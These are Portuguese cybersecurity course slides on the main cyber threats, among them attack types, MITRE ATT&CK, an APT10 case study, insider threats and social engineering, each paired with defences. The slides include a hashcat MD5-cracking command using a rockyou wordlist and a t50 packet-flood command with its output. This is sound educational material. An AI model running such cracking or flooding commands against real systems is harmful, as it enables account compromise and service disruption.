Buscar

Indentificar as principais ameaças cibernéticas

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes
Você viu 3, do total de 140 páginas

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes
Você viu 6, do total de 140 páginas

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes
Você viu 9, do total de 140 páginas

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Prévia do material em texto

Identificar as principais 
ameaças cibernéticas
Aula 1 – Tipos de ataques
Aula 2 – Atores de ameaças
Aula 3 – Engenharia Social
Aula 4 – Malwares 
Aula 01
Tipos de ataques
Introdução ao ataques cibernéticos
Segundo a IBM, podemos considerar como ataque cibernético
qualquer esforço com a intenção de roubar, expor, alterar,
desativar ou destruir dados, aplicativos ou outros ativos
através de acesso não autorizado a redes, sistemas de
computador ou dispositivos digitais.
O que são Ataques Cibernéticos?
Fonte: imagem - Freepik.com.
• Roubo de dados confidenciais.
• Interrupção de serviços críticos.
• Espionagem corporativa ou governamental.
• Causar destruição e caos.
• Impacto global significativo.
Objetivos
Fonte: imagem - Freepik.com.
Dentre os principais tipos de ataque, atualmente podemos citar
como principais ou mais estudados:
• Phishing.
• Injection.
• Malware.
• Engenharia social.
• DDoS.
• Força bruta (Brute Force).
• MiTM.
Tipos mais comuns de ataques
Fonte: imagem - Freepik.com.
Manter-se informado sobre as ameaças é essencial para 
mitigar riscos e proteger seus ativos digitais.
• Defesa em profundidade.
• Importância da cooperação e educação.
• Reflexão sobre vulnerabilidades pessoais / 
organizacionais.
Importância do tema
Fonte: imagem - Freepik.com.
“Se você acha que a tecnologia pode resolver seus
problemas de segurança, então você não entende os
problemas e não entende a tecnologia.”
(Bruce Schneier)
A seguir...
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Engenharia social e Phishing
Phishing é um método astuto de engano, mirando suas
informações pessoais ao se passar por entidades confiáveis.
Exploraremos suas formas, como spear-phishing e whaling,
para revelar como esses ataques são construídos para
enganar.
Fonte: Spear pishing disponível https://br.freepik.com/vetores-gratis/ilustracao-de-
phishing-hacker-roubando-um-cartao-de-credito-de-um-aplicativo-
cibercrime_12953617.htm#query=spear%20phishing&position=2&from_view=sear
ch&track=ais&uuid=18db6876-a67a-4afc-9a6b-b54713bd0e14. Acesso em 06 de 
dezembro de 2023
https://github.com/gophish/gophish
O que é Phishing
• Preparação da mensagem convincente.
• Enganar a vítima para executar ações prejudiciais.
• Exemplos de ações: clicar em links maliciosos, fornecer 
informações sensíveis.
Como funcionam os ataques de phishing
Fonte: Spear pishing disponível https://br.freepik.com/vetores-gratis/ilustracao-de-
phishing-hacker-roubando-um-cartao-de-credito-de-um-aplicativo-
cibercrime_12953617.htm#query=spear%20phishing&position=2&from_view=sear
ch&track=ais&uuid=18db6876-a67a-4afc-9a6b-b54713bd0e14. Acesso em 06 de 
dezembro de 2023
Identificar tentativas de phishing é um desafio, com sinais
reveladores como erros gramaticais e URLs suspeitas.
Identificando tentativas de phishing
Fonte: Spear pishing disponível https://br.freepik.com/vetores-gratis/ilustracao-de-
phishing-hacker-roubando-um-cartao-de-credito-de-um-aplicativo-
cibercrime_12953617.htm#query=spear%20phishing&position=2&from_view=sear
ch&track=ais&uuid=18db6876-a67a-4afc-9a6b-b54713bd0e14. Acesso em 06 de 
dezembro de 2023
• Utilização da psicologia humana contra nós.
• Enganar pessoas para revelar informações ou realizar 
ações comprometedoras.
• Compreensão das táticas para defesa eficaz.
O que é Engenharia Social
Fonte: Imagem de Flaticon.com.
"Engenharia social é qualquer ato que influencia uma pessoa 
a tomar uma ação que pode ou não ser em seu melhor 
interesse“.
Christopher Hadnagy.
O que é Engenharia Social
Fonte: Imagem de Flaticon.com.
A melhor defesa é o eterno alerta, a verificação da
autenticidade das solicitações e o uso de tecnologias de
segurança.
Prevenção
• Educação, conscientização e comprometimento como 
defesas principais.
• Conhecendo as táticas adversárias para evitar 
armadilhas.
Fonte: Imagem de Flaticon.com.
No próximo tópico, vamos caminhar para outros desafios:
• Ataques Man-in-the-Middle.
• Força Bruta (Brute Force).
A seguir...
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Ataques Man-in-the-Middle e 
força bruta
Imagine alguém escutando secretamente suas
conversas online. Os ataques MitM fazem
exatamente isso: interceptam comunicações
sem serem percebidos, mostrando a
vulnerabilidade das nossas interações
digitais.
Ataques Man-in-the-Middle (MitM) 
Fonte: Imagem de macrovector_oficial Freepik.com.
• Utilização de HTTPS para conexões seguras.
• Implementação de VPNs.
• Verificação cuidadosa de certificados digitais.
Como prevenir ataques MitM
Fonte: Imagem de macrovector_oficial Freepik.com.
No mundo dos ataques, a Força Bruta é como tentar abrir um
cofre testando todas as combinações possíveis.
Com a ajuda de softwares, até as senhas mais complexas
estão sob ameaça.
Ataques de Força Bruta (Brute Force)
Fonte: Imagem de macrovector_oficial Freepik.com.
$hashcat -m 0 42f749ade7f9e195bf475f37a44cafcb ../wordlists/rockyou.txt
O exemplo abaixo utiliza o dicionário rockyou.txt, para quebra de um hash MD5.
• Adoção de autenticação multifator.
• Criação de políticas de senha robustas.
• Fortalecimento das defesas digitais.
Estratégias de Proteção
Fonte: Imagem de macrovector_oficial Freepik.com.
Os ataques MitM e Força Bruta sublinham a necessidade de
uma estratégia de segurança digital abrangente, combinando
práticas sólidas, tecnologia avançada e vigilância constante.
A importância do tema
Fonte: Imagem de macrovector_oficial Freepik.com.
Nesse tópico, reconhecemos a importância dos pilares da 
segurança: Confidencialidade, Integridade e 
Disponibilidade.
No próximo tópico, abordaremos a Introdução aos 
ataques de negação de serviço (DoS e DDoS).
A seguir...
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Ataques Injections e DDoS
• Diferença entre DoS e DDoS.
• Impacto na disponibilidade de serviços digitais.
• Estratégias de amplificação e distribuição de 
ataques.
Conceitos – DoS e DDsS
Fonte: Imagem de macrovector_oficial Freepik.com.
DoS – Denial of Service
Fonte: Imagem de macrovector_oficial Freepik.com.
Alvo
Atacante
Pacotes 
malformados, 
Falsos 
endereços IP...
Pacotes 
malformados, 
Falsos 
endereços IP...
Pacotes 
malformados, 
Falsos 
endereços IP...
Pacotes 
malformados, 
Falsos 
endereços IP...
DDoS – Distributed Denial of Service
Fonte: Imagem de macrovector_oficial Freepik.com.
Alvo
Atacante
Dispositivos 
zumbis (botnet) 
enviam pacotes 
malformados, 
falsos 
endereços IP...
Alvo
Dispositivos 
zumbis (botnet) 
enviam pacotes 
malformados, 
falsos 
endereços IP...
Dispositivos 
zumbis (botnet) 
enviam pacotes 
malformados, 
falsos 
endereços IP...
Dispositivos 
zumbis (botnet) 
enviam pacotes 
malformados, 
falsos 
endereços IP...
Alvo Alvo
Algumas histórias marcantes:
• Ataques Mirai (2016).
• Ataque ao GitHub (2018).
Cenários de ataques
Fonte: Imagem de macrovector_oficial Freepik.com.
• Técnicas e ferramentas usadas em ataques 
DoS/DDoS.
• Como os ataques são orquestrados.
A T50, é uma ferramenta brasileira, injetora de pacotes 
multiprotocolo para realização de Testes de Estresse 
durante PenTest.
Mecanismo de ataque
$ t50 192.168.1.1 -–protocol t50 --flood
T50 Experimental Mixed Packet Injector Tool v5.8.7b
Originally created by Nelson Brito <nbrito@sekure.org>
Previously maintained by Fernando Mercês <fernando@mentebinaria.com.br>
Maintained by Frederico Lamberti Pissarra <fredericopissarra@gmail.com>
[INFO] PID=14919
[INFO] t50 5.8.7b successfully launched at Tue Jan 12 10:08:56 2024
Fonte: Imagem de macrovector_oficial Freepik.com.
• Identificação de Tráfego Malicioso.
• Teste a execução de ataques DoS.
• Balanceamento de Carga.
• Avaliando possíveis danos.
• Criando uma estratégia de backup.
• Planos de Resposta a Incidentes.
Impacto e Estratégia de mitigação
Fonte: Imagem de macrovector_oficial Freepik.com.
• Definiçãoe impacto dos ataques de Injection.
• O perigo representado pelo SQL Injection.
• A diversidade dos vetores de ataque de Injection.
O que é Injection
Fonte: Imagem de macrovector_oficial Freepik.com.
OWASP TOP 10
• Heartland Payment Systems (2008).
• Sony Pictures (2011).
Evidenciam as consequências devastadoras dos ataques de
Injection e a importância da segurança de aplicações.
Exemplos
Fonte: Imagem de macrovector_oficial Freepik.com.
• Práticas de segurança para prevenir Injection.
• Importância da validação de entrada e consultas 
parametrizadas.
• A necessidade de auditorias de segurança frequentes.
Prevenção
Fonte: Imagem de macrovector_oficial Freepik.com.
Encerramos nossa exploração sobre Injection e Ataques
DoS/DDoS, enfatizando a importância de defesas robustas.
Nossa próxima parada: Conhecendo os Atores de
Ameaças.
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
A seguir
Aula 02
Atores de ameaças
No contexto de segurança cibernética, são indivíduos, grupos,
organizações ou entidades que representam uma ameaça
potencial aos sistemas de informação, redes e ativos de uma
organização.
Eles têm motivações e intenções que variam amplamente, e
são categorizados em vários tipos com base em suas
características e objetivos.
Hackers
Fonte: imagem de macrovector_official no Freepik.com
#ficadica
Documentário: Hackers: Criminosos e Anjos
Black Hats (Hackers Maliciosos):
• São os antagonistas no mundo digital.
• Buscam explorar vulnerabilidades para fins ilegais.
• Impactos devastadores sobre indivíduos e organizações.
White Hats (Hackers Éticos):
• Utilizam suas habilidades para melhorar a segurança.
• Identificam e corrigem vulnerabilidades.
• Sua atuação é fundamental para a proteção de sistemas e redes
em todo o mundo.
Black Hat & White Hat
Fonte: imagem de storyset no Freepik.com
Atores de ameaça
Fonte: imagem de Macrovector no Freepik.com
• Indivíduos ou grupos envolvidos em atividades
cibernéticas maliciosas.
• Identificados por meio de práticas, técnicas e objetivos
comuns na comunidade de segurança cibernética.
• Podem ser rastreados e classificados com base em
metodologias analíticas específicas.
• Conhecidos por diversos nomes, como grupos de
ameaças, grupos de atividades ou simplesmente grupos,
dependendo da organização que realiza o rastreamento.
MITRE ATT&CK
Fonte: imagem de Macrovector no Freepik.com
• Diretrizes para classificar e descrever ataques
cibernéticos e invasões.
• Grupos são clusters de atividades rastreados por um
nome comum na comunidade de segurança.
• A equipe MITRE ATT&CK usa o termo Grupo para se
referir a qualquer uma das designações acima para um
cluster de atividade adversária.
• Táticas, Técnicas e Procedimentos (TTPs).
• Grupos de Ameaças.
• Software e Ferramentas.
• Campanhas Atribuídas.
• Mapeamento de Técnicas para Mitigações.
• Referências de Código Aberto.
MITRE ATT&CK
Fonte: imagem de Macrovector no Freepik.com
https://attack.mitre.org/groups/
A seguir...
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
No próximo tópico, vamos:
• Explorar motivações
• Estrutura Mitre ATT&CK
• Introdução às Ameaças Persistentes Avançadas (APTs)
Uma Jornada através da Estrutura 
MITRE ATTACK
Definição de APTs:
• Ataques cibernéticos complexos e sofisticados.
• Realizados por atores estatais ou organizações criminosas bem
financiadas.
• Utilizam a estrutura MITRE ATT&CK para execução e análise.
Introdução às Ameaças 
Persistentes Avançadas (APTs)
Fonte: imagem de macrovector official no Freepik.com
E1 - Reconhecimento
• Objetivo: Coletar informações sobre a organização-alvo.
• Técnicas utilizadas: Engenharia social, OSINT, varredura de rede.
• Exemplos de técnicas: Spearphishing, verificação de portas, 
mapeamento de rede.
Fonte: imagem de macrovector official no Freepik.com
• Objetivo: Obter acesso à rede da organização-alvo.
• Técnicas utilizadas: Exploração de vulnerabilidades, ataques de 
senha, comprometimento de software de terceiros.
• Exemplos de técnicas: Explorando vulnerabilidades, ataques de 
força bruta/pulverização de senha, ataques à cadeia de suprimentos.
E2 – Acesso inicial
Fonte: imagem de macrovector official no Freepik.com
• Objetivo: Estabelecer um canal de comando e controle para 
comunicação e controle dos sistemas comprometidos.
• Técnicas utilizadas: Instalação de Trojans de acesso remoto, uso de 
algoritmos de geração de domínio, canais secretos.
• Exemplos de técnicas: RATs, DGAs, comunicação via DNS ou HTTP.
E3 – Comando e Controle C2
Fonte: imagem de macrovector official no Freepik.com
• Objetivo: Mover-se lateralmente pela rede para comprometer sistemas 
adicionais e obter acesso a dados confidenciais.
• Técnicas utilizadas: Pass-the-Hash, exploração de serviços mal 
configurados, ataques de força bruta.
• Exemplos de técnicas: Uso de credenciais roubadas, exploração de 
vulnerabilidades em serviços/aplicações, ataques de força bruta para 
acesso a sistemas adicionais.
E4 – Movimento lateral
Fonte: imagem de macrovector official no Freepik.com
• Objetivo: Extrair dados confidenciais da organização-alvo.
• Técnicas utilizadas: Esteganografia, criptografia, exfiltração através 
de canais C2.
• Exemplos de técnicas: Ocultação de dados em arquivos legítimos, 
criptografar dados para evitar detecção, uso de canais C2 para 
exfiltrar dados.
E5 – Exfiltração de dados
Fonte: imagem de macrovector official no Freepik.com
• O impacto significativo das APTs nas organizações, incluindo perda 
financeira e de reputação.
• Estratégias de mitigação, conscientização de segurança, atualização 
e patch de sistemas, defesa em profundidade.
• A importância da colaboração e compartilhamento de informações 
para combater APTs.
Desafios e Impactos das APTs
Fonte: imagem de macrovector official no Freepik.com
A seguir...
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Nesse tópico, investigamos os atores de ameaças e exploramos os
detalhes do MITRE ATT&CK.
No próximo tópico, vamos conhecer as Ameaças Persistentes
Avançadas:
• Aprofundamento das Ameaças Persistentes Avançadas.
• MITRE ATT&CK como guia.
• Como os atores operam.
• Estratégias de defesa.
Estudo de caso – APTO10
Introdução ao Ataque APT10 – Stone Panda
• Relevância do grupo no cenário global de cibersegurança.
• Como a MITRE ATT&CK ajuda as organizações a compreender 
e combater APTs.
• Os diferentes estágios do ataque APT utilizado pelo APT10.
• A importância de entender as táticas e técnicas do APT10.
• Estratégias para desenvolver defesas mais eficazes contra 
ataques APT, utilizando a estrutura MITRE ATT&CK.
Fonte: AdobeStock
https://attack.mitre.org/
https://attack.mitre.org/
E1 - Reconhecimento
• Ataque Inicial do APT10 (2017).
• Grupos visados: Empresas dos EUA nos setores aeroespacial, 
de telecomunicações e tecnologia.
• Técnicas de Reconhecimento Utilizadas: Envio de e-mails com 
anexos maliciosos.
• Objetivo: Instalar backdoors nos computadores das vítimas.
• Inteligência de Código Aberto: Coleta de informações detalhadas 
sobre as empresas-alvo e suas redes.
Fonte: AdobeStock
E2 – Acesso Inicial
• Estabelecimento do Acesso Inicial
• Instalação de backdoor nos sistemas das vítimas.
• Uso de credenciais roubadas para acessar a rede.
• Movimento Lateral na Rede
• Aplicação de técnicas para se mover lateralmente pela rede 
alvo.
• Técnica "Pass the Ticket“ (AD)
• Descrição: Método utilizado para burlar os mecanismos de 
autenticação sem a necessidade de senha.
• Objetivo: Acessar contas e sistemas restritos dentro da rede 
alvo.
Fonte: AdobeStock
E3 - Comando e Controle | C2
• Estabelecimento de Canal C2
• Uso do RAT (Remote Access Trojan) chamado RedLeaves
para criar um canal de comando e controle.
• Funções do Canal C2
• Emissão de comandos remotos aos sistemas 
comprometidos.
• Exfiltração de dados sensíveis das organizações atacadas.• Impacto do Comando e Controle
• Acesso contínuo e não autorizado aos sistemas 
comprometidos.
• Risco significativo de vazamento de informações 
confidenciais.
Fonte: AdobeStock
E4 - Movimento Lateral
• Técnicas de Movimento Lateral
• Passar o Hash: Utilização de hashes de autenticação para 
acessar outros sistemas sem a necessidade das senhas 
originais.
• Exploração de Vulnerabilidades: Aproveitamento de falhas 
de segurança em softwares para ganhar acesso a sistemas 
adicionais.
• Roubo de Credenciais: Uso de técnicas para obter nomes de 
usuário e senhas legítimas.
• Uso de Ferramentas para Coleta de Credenciais
• Mimikatz: Ferramenta utilizada para extrair credenciais da 
memória de sistemas operacionais.
• Objetivo do Movimento Lateral
• Ampliação do acesso dentro da rede alvo.
Fonte: AdobeStock
E5 - Exfiltração de Dados
• Métodos de Exfiltração de Dados
• Uso de malware personalizado para coletar e transmitir 
dados.
• Aplicação de serviços legítimos de compartilhamento de 
arquivos, como o Dropbox, para disfarçar o tráfego 
malicioso.
• Objetivos da Exfiltração
• Roubo de informações sensíveis e propriedade intelectual.
• Acessar dados críticos para fins de espionagem ou 
vantagem competitiva.
• Desafios para a Segurança
• Dificuldade em detectar a exfiltração devido ao uso de 
ferramentas legítimas.
Fonte: AdobeStock
Conclusão e Defesa contra APTs
• APTs são ataques cibernéticos complexos e sofisticados com 
múltiplos estágios.
• Objetivam infiltrar redes e extrair dados de forma discreta e 
persistente.
• MITRE ATT&CK fornece uma visão abrangente e estruturada das 
táticas e técnicas de APT.
• Ajuda organizações a desenvolverem estratégias de defesa 
informadas.
• Cada estágio tem objetivos específicos dentro do ataque geral.
Fonte: AdobeStock
A seguir...
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
No próximo tópico, abordamos as Ameaças Internas:
• Funcionários, contratados ou parceiros com acesso
privilegiado podem se tornar fontes de ameaças.
• Discutiremos estratégias eficazes para mitigar esses riscos
com base no framework MITRE ATT&CK.
Prepare-se para aprofundar seu entendimento sobre como proteger
sua organização.
Ameaças internas
Ameaças internas
• Ameaças Internas:
• Funcionários, contratados ou parceiros com acesso
privilegiado podem se tornar fontes de ameaças.
• Discutiremos estratégias eficazes para mitigar esses riscos
com base no framework MITRE ATT&CK.
• Prepare-se para aprofundar seu entendimento sobre como
proteger sua organização.
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Estudo de Caso
• Contexto da ameaça:
• Incidente envolvendo um funcionário insatisfeito em uma
grande corporação tecnológica.
• Sabotagem de operações e comprometimento de
informações confidenciais.
• Métodos utilizados:
• Uso de credenciais de acesso: Acesso indevido a
informações sensíveis armazenadas em nuvem.
• Modificação de dados: Adulteração de informações críticas.
• Exfiltração de dados: Transferência de dados confidenciais
para terceiros.
• Impactos potenciais:
• Risco à propriedade intelectual e à reputação da empresa.
• Prejuízo à competitividade no mercado.
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Estudo de Caso
• Operação de Sabotagem:
• Utilização de manipulação de dispositivo de campo e
interferência no processo.
• Alteração do comportamento de dispositivos críticos e
interrupção de processos de produção. Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Estudo de Caso
• Consequências da sabotagem:
• Interrupções significativas nas operações de produção.
• Potencial dano a equipamentos de manufatura.
• Prejuízos financeiros imensuráveis.
• Perda de confiança dos stakeholders na segurança
operacional.
• Impactos abrangentes:
• Perda direta de propriedade intelectual até atrasos
prolongados na linha de produção. Efeito cascata sobre a
reputação e a competitividade da empresa no mercado.
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Técnicas utilizadas
1. Manipulação de Contas (Account Manipulation).
2. Comando e Controle (Command and Control).
3. Evasão de Detecção (Defense Evasion).
4. Exfiltração (Exfiltration).
Fonte: AdobeStock
Monitoramento
• Abordagem multifacetada contra ameaças internas.
• Integração com o MITRE ATT&CK.
• Utilização do framework para compreender explorações 
internas potenciais.
• Identificação e mitigação de vulnerabilidades específicas do 
sistema.
• Benefícios do monitoramento de comportamento anormal.
• Preparação contra comportamentos adversários.
Fonte: AdobeStock
A seguir...
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Nesse tópico, abordamos as Ameaças Internas:
• Funcionários, contratados ou parceiros com acesso
privilegiado podem se tornar fontes de ameaças.
• Discutiremos estratégias eficazes para mitigar esses riscos
com base no framework MITRE ATT&CK.
• Prepare-se para aprofundar seu entendimento sobre como
proteger sua organização.
Nosso próximo assunto será Engenharia social.
Aula 03
Engenharia social
Introdução a Engenharia Social
Engenharia Social
Fonte: Conceito engenharia Social. Disponível em 
https://as1.ftcdn.net/v2/jpg/01/83/33/78/1000_F_183337827_UqL2wIab5y
xh3r7Iysxd7RtnnbHph4H1.jpg. Acesso em 05 de dezembro de 2023
"Engenharia social é qualquer ato que influencia uma pessoa a tomar 
uma ação que pode ou não ser em seu melhor interesse“.
Christopher Hadnagy.
“A engenharia social, no contexto de segurança da informação, 
refere-se à manipulação psicológica de pessoas para a execução de 
ações ou para a divulgação de informações confidenciais.” (Wikipedia)
“A Engenharia Social é uma técnica de manipulação que explora erros 
humanos.” (Kaspersky)
https://pt.wikipedia.org/wiki/Engenharia_social_(seguran%C3%A7a)
https://www.kaspersky.com.br/resource-center/definitions/what-is-social-engineering
Tipos de Engenharia Social
Algumas manifestações da Engenharia Social:
• Phishing.
• Pretexting.
• Baiting.
• Ataque Evil Twin.
Fonte: Email pishing. Disponível em 
https://as1.ftcdn.net/v2/jpg/04/74/33/90/1000_F_474339043_QzXUc0
C7swuLQE0X4odISvMDsCC6Mscl.jpg. Acesso em 05 de dezembro 
de 2023
Métodos de engajamento
Fonte: o Autor
• E-mails falsos: E-mails meticulosamente desenhados para enganar 
os destinatários.
• Manipulação online: Utilização de redes sociais para atacar, por 
meio de perfis falsificados ou mensagens diretas.
Engajamento & Conscientização
Fonte: worm virus. Disponível em https://www.flaticon.com/br/icone-
gratis/phishing_4576426?term=phishing&related_id=4576426. 
Acesso em 05 de dezembro de 2023
• Conhecimento das táticas
• Sempre realizar a verificação da autenticidade
• Atitude atenta mitiga os riscos de manipulação e fraude.
• O conhecimento como primeiro passo para a prevenção.
A seguir...
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Nesse conteúdo, abordamos a Engenharia Social e suas técnicas
que exploram a natureza humana para acesso a informações
valiosas.
No próximo tópico, abordaremos:
• Aprofundamento em técnicas sofisticadas e direcionadas.
• Foco no Spear Phishing e EvilPortals
A vigilância constante é essencial.
Técnicas de Phishing e EvilTwin
Ataque Evil Twin
O ataque Evil Twin é um exemplo perfeito de como a confiança em
redes Wi-Fi públicas pode ser explorada. Imagine atacantes
tecnicamente habilidosos criando redes Wi-Fi fantasma, disfarçadas
perfeitamente como conexões legítimas em seus locais favoritos,
esperando capturar suas informações mais sensíveis.
• Exploração da confiança em redes Wi-Fi públicas.
• Atacantes habilidosos imitando conexões legítimas em
locais populares.
• Captura de informações sensíveis.
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Construindo o ataque
Fonte: Phishing. Disponível em <a <https://www.flaticon.com/br/icone-
gratis/phishing_4616197?term=phishing&page=1&position=3&origin=search&related_id=4616197>. Acesso em 05 de dezembro de 2023
• Seleção do alvo e do local: O atacante identifica locais ideais onde a 
probabilidade de conexão do alvo é alta.
• Criação de um ponto de acesso falso: Com ferramentas simples, cria-
se uma rede que parece legítima, mas é uma armadilha para 
interceptar dados.
• Elaborar páginas de login falsas (captive portals) que imitam as 
páginas de login reconhecidas pelo alvo.
• Induzir o alvo à conexão, por meio de um QR-Code (QRLJacking) que 
aparenta ser de uma rede Wi-Fi legítima. Esse QR-Code pode ser 
impresso em um cartaz ou adesivo, exibido em um site ou enviado 
por e-mail.
Coleta de Dados
Fonte: Vishing. Disponível em <a <https://www.flaticon.com/br/icone-
gratis/phishing_4616197?term=phishing&page=1&position=3&origin=sea
rch&related_id=4616197>. Acesso em 05 de dezembro de 2023
• Acesso irrestrito do atacante ao tráfego de dados.
• Captura de informações confidenciais.
• Distribuição de malware e ataques secundários.
• Aumento significativo do impacto negativo devido à exploração 
avançada.
Refinamento – QRLJacking
• Phishing: Lança uma rede ampla, esperando capturar qualquer
coisa.
• Spear Phishing: Estratégia de arpão preciso, visando indivíduos ou
organizações específicas.
• Ataques meticulosamente coletados.
• Investimento de tempo na pesquisa de alvos em redes sociais
e websites corporativos.
• Ataques Evil Twin podem ser mixados para amplificar o resultado.
Fonte: OWASP (https://owasp.org/www-
community/attacks/Qrljacking) acesso em 13/03/2024
https://owasp.org/www-community/attacks/Qrljacking
A seguir...
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Nesse tópico, abordamos:
• Simulação de ataques de phishing.
• Conscientização do usuário.
• Ataques Evil Twin durante um PenTest
• Ao demonstrar como os ataques funcionam, os
profissionais de segurança podem educar os usuários sobre
os riscos.
No próximo tópico, abordaremos o Baiting e Pretexting, que
envolvem a criação de cenários fictícios para enganar as pessoas e
obter informações confidenciais.
Baiting e Pretexting
O que é Baiting
• Técnica de Engenharia Social similar ao Cavalo de Troia.
• Método: Oferece recompensas atraentes (software gratuito, filmes, 
acesso exclusivo) para seduzir vítimas.
• Risco: Ofertas tentadoras podem levar à instalação de malware, 
divulgação de informações pessoais ou comprometimento da 
segurança.
• Precaução: Importância da conscientização sobre táticas e cautela 
com ofertas físicas ou online.
Fonte: Bait. Disponível em <https://www.flaticon.com/br/icone-
gratis/isca_4634475?term=isca&related_id=4634475>. Acesso em 05 de 
dezembro de 2023
Exemplos de Baiting
Fonte: o Autor
• Uso de dispositivos USB infectados, como o Rubber Ducky, em 
estratégias de Baiting.
• Cenário: Dispositivos USB, disfarçados de pendrives comuns, são 
deixados em locais de alta circulação.
• Rubber Ducky: Ferramenta de pentesting que simula um teclado e 
executa comandos pré-programados quando conectado a um 
computador.
• Potencial prejudicial: Dispositivos carregam riscos significativos, 
podendo instalar malware ou executar ações maliciosas 
automaticamente.
Baiting & Ducky
Fonte: o Autor
• Ducky, ao conectar, executa scripts mal-intencionados, sem expor 
arquivos.
• Ações maléficas em segundos:
• Roubo de credenciais: Extrai login, senhas, e dados sensíveis.
• Instalação de backdoors: Cria brechas para acessos futuros 
não autorizados.
• Comprometimento da segurança: Conexão inadvertida pode 
comprometer a segurança do sistema e da rede.
• A tendência à curiosidade pode levar à conexão de dispositivos 
desconhecidos, destacando a importância da conscientização.
O que é Pretexting
• Técnica de engenharia social baseada na criação de histórias 
convincentes.
• Enganar vítimas para revelarem informações sensíveis ou 
concederem acesso não autorizado.
• Atacantes se passam por entidades confiáveis, adotando 
identidades falsas ou autoridades inexistentes.
• Usa a tendência natural das pessoas em confiar em figuras de 
autoridade ou conhecidas.
• Visa a manipulação de indivíduos para fins maliciosos através da 
confiança
Fonte: Conversa. Disponível em <https://www.flaticon.com/br/icone-
gratis/pacientes_6260326?term=conversa&page=1&position=12&origin=
search&related_id=6260326>. Acesso em 05 de dezembro de 2023
Aspectos do Pretexting
• Narrativa enganosa.
• Identidade falsa.
• Objetivos diversificados.
• Cenários comuns de Pretexting:
• Atualizações de senha.
• Emergências fabricadas.
• Personificação de autoridades.
Fonte: Conversa. Disponível em <https://www.flaticon.com/br/icone-
gratis/pacientes_6260326?term=conversa&page=1&position=12&origin=
search&related_id=6260326>. Acesso em 05 de dezembro de 2023
Evitando Baiting e Pretexting
• Desconfiança saudável.
• Verificação de fontes.
• Educação e treinamento.
• Políticas de Segurança.
• Autenticação multifator (MFA).
Fonte: Conceito engenharia Social. Disponível em 
https://as1.ftcdn.net/v2/jpg/06/17/46/30/1000_F_617463050_MaIqbjI9I30m637HuUaCb00BSE8AQZ
Jc.jpg. Acesso em 05 de dezembro de 2023
A seguir...
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Nesse tópico, abordamos:
• Baiting e Pretexting exploram confiança e curiosidade.
• Conscientização e conhecimento: Principais defesas
• Implementação de políticas de segurança robustas
• Desenvolvimento de vigilância comportamental aguçada
No próximo tópico, abordaremos as estratégias de defesa contra 
engenharia social.
Defesa Contra Engenharia Social
Fonte: ícone de Freepik.com. Acesso em 06 
de dezembro de 2023
Educação de Indivíduos
• Conhecimento como defesa contra engenharia social:
• Importância das simulações de phishing, baiting...
• Manter exercícios práticos para preparo efetivo.
• Educação contínua amplia a consciência sobre segurança e 
reforça práticas seguras no cotidiano.
• Conexão com a Comunidade:
• A excelência do conhecimento.
• Oportunidades através da rede de contatos.
Ferramentas de Segurança Cibernética
• Essencial complementar a educação com ferramentas de
segurança.
• Defina uma diversidade de soluções:
• Soluções antiphishing.
• Firewalls.
• Sistemas de detecção de intrusão.
• Software de segurança para endpoints.
• Tecnologias ajudam a formar uma defesa sólida.
• Mantenha a prevenção proativa.
Fonte: ícone de Freepik.com. Acesso em 06 de 
dezembro de 2023
Políticas de Segurança Fortes
• Desenvolvimento e manutenção de Políticas de Segurança.
